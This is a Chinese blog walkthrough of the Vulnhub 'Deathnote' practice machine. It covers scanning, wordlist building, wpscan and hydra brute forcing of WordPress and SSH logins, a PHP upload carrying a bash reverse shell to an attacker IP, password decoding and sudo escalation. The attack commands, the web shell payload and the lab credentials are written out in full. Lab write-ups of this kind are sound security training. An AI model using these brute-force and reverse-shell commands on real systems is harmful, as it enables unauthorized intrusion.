deathnote靶机攻略

已于 2023-10-12 21:46:50 修改
阅读量172 收藏
点赞数 3
分类专栏: 靶机系列 文章标签: 网络安全 web安全 安全威胁分析 安全 密码学 其他 笔记
于 2023-10-12 21:45:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133799872
版权

deathnote

扫描及信息搜集

此靶机需要修改/etc/hosts添加dns,不然无法跳转主页

nmap -sV -A -p- 10.4.7.133

dirsearch -u http://10.4.7.133

image-20231012114854770

image-20231012114922267

http://10.4.7.133/robots.txt

在此目录下发现提示

image-20231012140600001

访问下,发现无法正常显示

image-20231012140932309

wget http://10.4.7.133/important.jpg

cat important.jpg

image-20231012141121620

提示在hint

image-20231012142030291

需要找到notes.txt和user.txt,再使用dirb扫描看看结果

dirb http://10.4.7.133

在结果中尝试访问

http://10.4.7.133/wordpress/wp-content/uploads/2021/07/

image-20231012142741182

找到这两个文件

使用wget下载这两个文件

image-20231012142900491

使用爬取将密码写入一个文件

cewl http://deathnote.vuln/wordpress/ -w kirapasswd.txt

再把hint页中的这条加入密码本,将notes.txt也放入密码本

image-20231012143627659

密码爆破

wpscan --url http://10.4.7.133/wordpress/ -U user.txt -P kirapasswd.txt

image-20231012170433547

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f -t 50

image-20231012210922451

l
death4me

渗透

image-20231012202857350

此处发现上传框,尝试上传木马

木马内容

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.4.7.130/12138 0>&1'"); ?>

image-20231012203921480

点击木马文件复制url

image-20231012204140549

kali开启nc

nc -lvvp 12138

随后访问复制的url执行木马即可反弹成功

家目录l目录下发现user.txt文件,该密码文件为brainfuck

image-20231012204450715

解码结果为如图

image-20231012204629597

上述信息没发现有啥作用

在/opt目录下有信息文件

image-20231012205437099

image-20231012205539187

image-20231012205709700

尝试解码

image-20231012205848001

image-20231012210107513

如图16进制解码再用base64解码得到密码

passwd : kiraisevil

尝试使用su root或者sudo -l发现不能使用

使用上面九头蛇爆破的ssh l登录,发现和反弹shell的用户没什么区别

于是将密码新破解的密码放入密码字典再次尝试爆破,看看是不是其它用户的密码

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f 50

image-20231012213347476

得到新用户

kira
kiraisevil

提权

image-20231012213634064

登录kira账户

查看id发现有sudo权限

执行sudo -l发现有sudo所有权限

执行sudo su root完成提权

image-20231012213924737

order libra
关注
专栏目录
Deathnote靶机
qq_40646572的博客
05-19 743
信息收集 开启deathnote靶机。 通过nmap扫描,发现靶机开启了80端口以及22端口。 地址栏输入ip地址,页面跳转。因此需要配置dns。 配置下/etc/hosts文件。 使用whatweb工具识别下web服务中使用的技术,发现使用的是wordpress框架。 发现http://deathnote.vuln/ 网站下存在关键文件robots.txt。 上面提示到提示信息在important.jpg文件中。 图片无法正确加载出来,那就先下载下来。 发现直接使用cat方法可以直
vulnhub:DEATHNOTE:1靶机
qq_63283137的博客
09-28 299
kira用户可以使用sudo的任意命令,那直接切换用户好了:sudo su - 默认是切换root用户。login.php是登录页面,想着登录进去,弱口令字典+burp爆破下。得到密码kiraisevil,写入密码字典后,再用九头蛇爆破一遍。提示登录用户名在user.txt文件中,密码在网站中需要自己找。用户,字典都有了,使用wpscan开始爆破用户登录网页。发现notes.txt,点击,访问文件地址。根据收集的账户,密码进行爆破ssh用户。使用爆破的账户密码,登录成功。
Vulnhub靶机Deathnote
qq_48904485的博客
01-12 970
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机Deathnote(10.0.2.16)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/deathnote-1,739/
vulnhub-Deathnote靶场
lionwerson的博客
11-28 3679
Deathnote下载https://download.vulnhub.com/deathnote/Deathnote.ova1.打开靶机,nmap扫描一下端口: 只有22和80端口,打开浏览器,然后修改host文件: IP deathnote.vuln 这个靶场是死亡笔记的主题,头像是死亡笔记男主神无月,死亡笔记的持有者之一,外界称为基拉,也就是kira,上面写的是我会干掉你 L,L是剧中的侦探,为了抓捕男主基拉。 hint表示线索,让我们寻找notes.txt或者L的评论。 ...
靶机14 DEATHNOTE: 1
honest_gg的博客
10-09 1181
不要浪费太多时间跳出框框思考。这是一个直截了当的盒子
DEATHNOTE
10-24
DEATHNOTE》——探索字体设计的艺术与应用 在数字化时代,字体设计不仅是文字的呈现方式,更是传达信息、塑造品牌形象、营造氛围的关键元素。"DEATHNOTE"这个标题,或许让人联想到著名的日本动漫作品《死亡笔记》...
DeathNote-crx插件
04-06
"DeathNote-crx插件"是一款专为浏览器设计的扩展程序,主要特色在于它将流行的《死亡笔记》(Death Note)元素融入了用户的网络浏览体验。这款插件以德语(Deutsch)为主要语言,旨在为每一个新打开的标签页带来一种...
deathnote-web
05-12
死亡笔记网 安装 npm i 跑步 npm start 结构 src/Services包含与API请求/响应相关的组件,挂钩和函数。 src/Components包含与UI相关的可重用的React组件。 src/router包含页面(路由)。
DeathNote.github.io
05-30
"死亡笔记.github.io"是一个基于GitHub Pages构建的个人网页项目,标题中的"DeathNote.github.io"通常是指这个项目的在线地址,表明它是一个公开的、与《死亡笔记》这个主题相关或者以此为灵感的个人网站。...
Vulnhub靶机_Deathnote
学术渣渣的博客
09-12 1976
文章目录靶机介绍渗透过程获取靶机IP端口扫描dirb扫描网站目录信息1信息2信息3登录wordpresshydra 爆破密码提权 靶机介绍 下载地址: http://www.vulnhub.com/entry/deathnote-1,739/ 难度:简单 介绍: don’t waste too much time thinking outside the box . It is a Straight forward box . 渗透过程 获取靶机IP arp-scan -l 得到靶机的IP为:192.1
Deathnote靶机实验实战演练
lianliandad的博客
10-31 903
每周练习打靶之DEATHNOTE: 1 死亡笔记
chhsbsjs的博客
03-04 732
​​​​​​​http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/在这个目录里发现了我们想要的user.txt。打开kali,curl http://192.168.13.139/wordpress/wp-content/uploads/2021/07/notes.txt 发现很多密码。打开发现目录为http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt。
VulnHub日记(十二):Deathnote:1
Dawn_Xi的博客
10-09 715
靶机介绍 虚拟机链接:Deathnote: 1 ~ VulnHub 参考博客:Deathnote - Writeup - Vulnhub - Walkthrough - Security 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.127 使用netdiscover发现主机ip netdiscover -r 192.168.56.0/24 nmap扫描开放服务 nmap -A 192.168.56.127 访问80口,写入host文..
deathnote1靶机超详细新手笔记
m0_65938147的博客
04-11 929
Kali linux_百度百科 (baidu.com)](https://baike.baidu.com/item/Kali linux/8305689)
vulnhub靶机-DEATHNOTE: 1
臭nana的博客
10-24 6155
1、找到靶机ip:192.168.43.11 nmap -sn 192.168.43.0/24 2、扫描靶机端口,只开放22和80端口 ┌──(root????cracer)-[~] └─# nmap -p- -A 192.168.43.11 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for deathnote (192.168.43.11) Host is up (0.0012s latency). Not shown
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8570
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全设备系列】3、IPS(入侵防御系统)
最新发布
Hacker_Oldv的博客
11-22 1095
IDS和IPS的关系,并非取代和互斥,而是相互协作:没有部署IDS的时候,只能是凭感觉判断,应该在什么地方部署什么样的安全产品,通过IDS的广泛部署,了解了网络的当前实时状况,据此状况可进一步判断应该在何处部署何类安全产品(IPS等)。入侵检测系统(IDS)对那些异常的、可能是入侵行为的数据进行检测和报警,告知使用者网络中的实时状况,并提供相应的解决、处理方法,是一种侧重于风险管理的安全产品。2、旁路部署的IDS可以及时发现那些穿透防火墙的深层攻击行为,作为防火墙的有益补充,但很可惜的是无法实时的阻断。
更新/ql/data/repo/leafTheFish_DeathNote失败,请检查网络...
05-28
出现更新/ql/data/repo/leafTheFish_DeathNote失败,请检查网络的情况,可能是因为以下原因之一: 1. 网络连接问题:请检查您的网络连接是否正常,确保您的设备已连接到互联网。 2. 防火墙或代理问题:请检查您的防火墙和代理设置,确保它们不会阻止青龙面板连接到互联网。 3. 仓库源问题:请确保您的青龙面板已经正确配置了仓库源,您可以尝试使用其他仓库源进行更新操作。 4. 仓库权限问题:请检查您的仓库目录是否有足够的权限进行更新操作。 如果您已经检查了以上问题但仍然无法进行更新操作,请联系青龙面板的开发者或相关技术支持人员获取帮助。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值